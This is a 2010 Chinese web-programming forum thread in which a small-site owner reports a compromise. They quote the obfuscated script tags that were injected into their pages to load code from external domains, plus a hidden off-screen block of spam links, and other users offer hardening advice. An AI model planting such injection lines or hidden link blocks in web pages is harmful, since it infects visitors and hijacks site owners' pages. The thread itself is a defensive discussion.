编程论坛 → ASP技术论坛

有研究木马的吗？

zfc123 发布于 2010-05-12 13:20， 993 次点击

今天刚给网站加了个计数器功能，ftp以后，打开网站卡巴提示有木马，感到不大对劲，难道计数器程序被误报，但宁可信其有不可信其无，试了几遍均报木马，于是ftp下整个网站，下载的过程中卡巴连接提示20多个网页有木马，等下载完后，和本地的文本比对了一下，发现在网页下面多一行js代码。<script src=http://%65%2Ec%6Bt4%2Ecn></script><script src=http://%65.%74%6C%69n%65e%2Ecom.c%6E></script>全部替换后，不在提示木马了，这里还要赞一下卡巴，提前发现，尽早解决。

本人刚接触网站，对网站挂马不大了解，一直以为自己的小网站，没人会在意，没想到却中招了，想请教高手，怎么在保留后台功能的前提下，禁止空间文件和目录被修改。

我在网上搜了一下，木马就是利用图片上传功能上传的木马，现在已经禁止图片目录的执行权限了，木马文件我也找到了，是奥运专版网站维护工具(加强版)。

8 回复

#2

gupiao1752010-05-12 14:06

你用的是自己的服务器，还是虚拟空间？？

#3

zfc1232010-05-12 14:24

虚拟空间，他有关闭目录asp执行权限功能，还有一个关闭所有目录上传功能，但不能用，因为关了后ftp都不能用。

#4

gupiao1752010-05-12 15:45

一切设置都在服务器上，程序防黑写得再好，服务器防黑能力不行，一样会中标！估计整个服务器中了，而不仅仅是你一个WEB站点出问题！估计你买的虚拟空间防黑做得不够好，这种价格也比较便宜！

#5

zfc1232010-05-12 15:49

是很便宜，还号称是BGP双线，后来我才知道，这个价格不大可能，我用的是动易编辑框，可能有漏洞。

#6

gupiao1752010-05-12 17:23

自己玩玩的网站无所未，被黑其实也是一种光荣！呵呵！
如果是有特殊要求的，可以和知名品牌空间商（比如万网等全国性的）签署协议，这样安全多了！

#7

hams2010-05-12 17:34

把所有需要上传或修改的目录放到一个指定目录内，比如数据库和上传文件夹，把这个目录设为只能读写不能执行，其它的目录设为只能执行不能写

#8

zfc1232010-05-12 19:25

真疯了，现在木马居然在我的网页里加入了这些代码

程序代码：

<MARQUEE width=%221%22 height=%229%22>
<div style="position: absolute; top: -88px;left: -88px;"><a href="http://www.

"target="_blank">591</a><a href="http://www.2427.html "target="_blank">09婚纱</a><a

href="http://www. "target="_blank">19楼</a><a

href="http://www. "target="_blank">591结婚网</a><a

href="http://www. "target="_blank">80后婚纱照</a><a

href="http://www. "target="_blank">80后结婚照</a><a

href="http://www. "target="_blank">90后婚纱照</a><a

href="http://www. "target="_blank">90后结婚照</a><a

href="http://www. "target="_blank">99结婚网</a><a

href="http://www. "target="_blank">babyface</a><a

href="http://www. "target="_blank">bbf</a><a

href="http://www. "target="_blank">dhc</a>
</div>
</MARQUEE>

#9

guolvbai2010-08-05 23:43

楼上这个叫 “挂黑链”

1